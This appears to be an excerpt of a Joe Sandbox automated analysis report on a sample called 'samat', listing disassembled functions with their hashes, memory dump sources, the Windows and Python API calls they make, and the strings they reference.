                                                                                                                                                                                                                                                                                      • Instruction ID: f912f4069784d5c94e60c49d58f5de6dbbf1f4eb44093d34188177df1f2037fb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9257cef95fa0abca0fdc74fa17bf64a4a18db8c9670460e5b188c7a4c9a2dfc3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B911FB72A08B4692EB108B59F4404AEB764FF88BC4F444132EB8D47B69DE3CE654CB40
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple$ClearErr_
                                                                                                                                                                                                                                                                                      • String ID: AddAccesAllowedAce$lO:AddAccessAllowedAce$llO:AddAccessAllowedAce
                                                                                                                                                                                                                                                                                      • API String ID: 2492218514-648165593
                                                                                                                                                                                                                                                                                      • Opcode ID: 3ef4422c3111dd9ae3b784dbffad1bbc340a2c81814f7b2475e4556d86d72b89
                                                                                                                                                                                                                                                                                      • Instruction ID: 150cb7c87e6295f20876a5cad18b65d51edde0b11844a2b6298c5e605bc8ef4b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ef4422c3111dd9ae3b784dbffad1bbc340a2c81814f7b2475e4556d86d72b89
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C811FE76A08B4692EB508F59F4404AEB7A4FF88BD4F444032EB8D43B29EE3CD654CB40
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ControlDescriptorErr_ParseSecurityStringTuple
                                                                                                                                                                                                                                                                                      • String ID: SetSecurityDescriptorControl$SetSecurityDescriptorControl does not exist on this platform$ll:SetSecurityDescriptorControl
                                                                                                                                                                                                                                                                                      • API String ID: 1690190277-853495732
                                                                                                                                                                                                                                                                                      • Opcode ID: ca04b7d0fea14b1eeca76fa55091ac8873dd5a18c7a071162c64d02978383f12
                                                                                                                                                                                                                                                                                      • Instruction ID: d12d46b6b902b6d13b35d7fecb4a17b6d5e79093eac7f09a8ac594239f2998a6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca04b7d0fea14b1eeca76fa55091ac8873dd5a18c7a071162c64d02978383f12
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1110C62A2874682EB548F5DE88027D23A1FF85FC4F484071EB4D467B5DE3CE595C710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BuildCopyLengthReferenceValuemalloc
                                                                                                                                                                                                                                                                                      • String ID: (ll)lN
                                                                                                                                                                                                                                                                                      • API String ID: 1144616375-415220060
                                                                                                                                                                                                                                                                                      • Opcode ID: e8749222804a17c14589da8d80a8dfa4130c09778a5ed6446d50b6ac359eea1b
                                                                                                                                                                                                                                                                                      • Instruction ID: 161e080d4ddfd8ea495c8b3dc643702e4b1ec0f30efaf99edeee87085a77b108
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8749222804a17c14589da8d80a8dfa4130c09778a5ed6446d50b6ac359eea1b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A113632A08B928AEB648F59A44022C73A0FF49FC0F584035EB8E537B5EF3CE5658740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$BuildClearDeallocStringValue
                                                                                                                                                                                                                                                                                      • String ID: (i)$invalid timestamp
                                                                                                                                                                                                                                                                                      • API String ID: 3614533335-2037815563
                                                                                                                                                                                                                                                                                      • Opcode ID: 64888a64718f88c2b21e33994be5d13bf83f3b1d82c56865ddfd3e790820648b
                                                                                                                                                                                                                                                                                      • Instruction ID: 2c8af2a2797254cc1d890c40eb55a2f03f7b3402977130959893a0b09f8d0229
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64888a64718f88c2b21e33994be5d13bf83f3b1d82c56865ddfd3e790820648b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B012C66E09B0681FB158B6EE84413C23B0AF59FC5F481032DA0E02775DE3CE4848700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • PyDEVMODE::PyDEVMODE - Unable to allocate DEVMODE of size %d, xrefs: 00007FF8B7E84A66
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Err_FormatReferencemalloc
                                                                                                                                                                                                                                                                                      • String ID: PyDEVMODE::PyDEVMODE - Unable to allocate DEVMODE of size %d
                                                                                                                                                                                                                                                                                      • API String ID: 3577276951-318570358
                                                                                                                                                                                                                                                                                      • Opcode ID: 96d05b4b8ad6c57b41a39e5f0ab8f2408ee3286b050f5ce7c13a181665dd239a
                                                                                                                                                                                                                                                                                      • Instruction ID: 97cdfcab90529fd871a52b104db25ce6f6fb7dd5ec628a59c77203532d3fdd16
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96d05b4b8ad6c57b41a39e5f0ab8f2408ee3286b050f5ce7c13a181665dd239a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2101E562A08B12A2EB148F9AE95407C7364FF48FC5B844035EB5E07766EF3DE4A4C310
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_BuildErr_ParseStringTextTupleUnicodeValue
                                                                                                                                                                                                                                                                                      • String ID: s#i$string size beyond INT_MAX
                                                                                                                                                                                                                                                                                      • API String ID: 2273782283-3494499060
                                                                                                                                                                                                                                                                                      • Opcode ID: 4b5c9164ba692dd86c3d625a5a86657bc7a4acf53301f7ed8babcb47b8e01204
                                                                                                                                                                                                                                                                                      • Instruction ID: 6f15e47d43f7e737a74862e24906107f18d15b96345dcfc0d29ee8088ed423b1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b5c9164ba692dd86c3d625a5a86657bc7a4acf53301f7ed8babcb47b8e01204
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0601FF76F18B4692DB009B99E4540AD63A1FF85FD4F804132E64D877B5DE3CE509C740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AuthorityBuildErr_IdentifierStringValidValue
                                                                                                                                                                                                                                                                                      • String ID: (BBBBBB)$GetSidIdentifierAuthority: Invalid SID in object
                                                                                                                                                                                                                                                                                      • API String ID: 4045288465-3761804006
                                                                                                                                                                                                                                                                                      • Opcode ID: 615ff364ecf4b2f6fbb4577ac1032b11da4648b0c55427ed7780864fcfb30ffc
                                                                                                                                                                                                                                                                                      • Instruction ID: 78ab62e824c5a78cbf2237c25d9eb76c693986b7e9522cc7f936d32f3771f351
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 615ff364ecf4b2f6fbb4577ac1032b11da4648b0c55427ed7780864fcfb30ffc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9012862A1869282EB418B69A85043D7BA0FF85FC6F098071EA9E42361CF3CC5658710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CallsMakePending$ClearErr___acrt_iob_func__stdio_common_vfprintffprintf
                                                                                                                                                                                                                                                                                      • String ID: Unhandled exception detected before entering Python.
                                                                                                                                                                                                                                                                                      • API String ID: 322838838-920423093
                                                                                                                                                                                                                                                                                      • Opcode ID: bbccaab3a7c4ad21d36c60cf5a593e4e3c5db407707c02aee8003046da95ed00
                                                                                                                                                                                                                                                                                      • Instruction ID: ea32e8a9ad5c2f4032bc97867cb1384c0f1f86ccb56828d6ef3921a8a125f45a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbccaab3a7c4ad21d36c60cf5a593e4e3c5db407707c02aee8003046da95ed00
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDE01211E0D703A1F7042BEDEC8563D22645F45FC5F810174D70F412F2EE3CA4898210
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8EFD
                                                                                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8F5A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9
                                                                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8FE5
                                                                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C9044
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C9055
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C906A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                                                                      • Instruction ID: 32fed1b1886a366e95b6ad5dbc68e2d71c9ae68cfe8699d04e55929775e055ee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5141D762B1968281EF30AB11A8013BAB398FF85BD4F854136DF4E57789DEBDD501C721
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _aligned_free_aligned_malloc$callocfree
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2511558924-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8fb2105fd7c39bf321232f7441f6f1b7ebcf620c9448f78960a77339e4ca462d
                                                                                                                                                                                                                                                                                      • Instruction ID: cf213de5ba68525999b3dd5cb5ca03bc3c4bb761dfa14be36737d6f78a858052
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fb2105fd7c39bf321232f7441f6f1b7ebcf620c9448f78960a77339e4ca462d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0412866A09A4283EA15CB49E45027873A0FF88B92F484531CF4D43794EF7CF89AC304
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: List_$AppendDealloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1573934073-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7df2b78d6d5287c60bc640f919dbf0db1eaa50ea8ef363c97fcee23fcdab4804
                                                                                                                                                                                                                                                                                      • Instruction ID: 7270f902f1f22b1f25fa771ad7d58ecce67d9611d67783e044bcf85dd89cbbb9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7df2b78d6d5287c60bc640f919dbf0db1eaa50ea8ef363c97fcee23fcdab4804
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4313932E09B4286FA585F1AE55427D62B0AF04FE4F885234EB6E46BF2DF7CE4518300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: List_$AppendBytes_DeallocFromSizeString
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3583985797-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fa9e8c22ace8bfa2a7f8576b109cd451eb3fbd3c9cda2f4208ba26d535e53f9c
                                                                                                                                                                                                                                                                                      • Instruction ID: 76ecd9143cab5add8583870cbb39e3cdf5544a04427a1c30a29b90abc9d6bdde
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa9e8c22ace8bfa2a7f8576b109cd451eb3fbd3c9cda2f4208ba26d535e53f9c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D311C32E0974286FA694F69A55423C62A1AF45FE4F8C5234DB6E467E6EF3CE4518300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: GetCurrentProcess.KERNEL32 ref: 00007FF7E12C8590
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: OpenProcessToken.ADVAPI32 ref: 00007FF7E12C85A3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: GetTokenInformation.ADVAPI32 ref: 00007FF7E12C85C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: GetLastError.KERNEL32 ref: 00007FF7E12C85D2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: GetTokenInformation.ADVAPI32 ref: 00007FF7E12C8612
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7E12C862E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: CloseHandle.KERNEL32 ref: 00007FF7E12C8646
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF7E12C3C55), ref: 00007FF7E12C916C
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF7E12C3C55), ref: 00007FF7E12C9175
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                                      • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                                      • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                                                      • Instruction ID: 395dd86bfe94c07938228bacbb809f435052dff1d1ec76479bf52faa911c552e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E213021B0864282EB11BB10EC163EAA259FF84780FC54437EA4E57795DFBCD545C761
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB2D7
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB30D
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB33A
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB34B
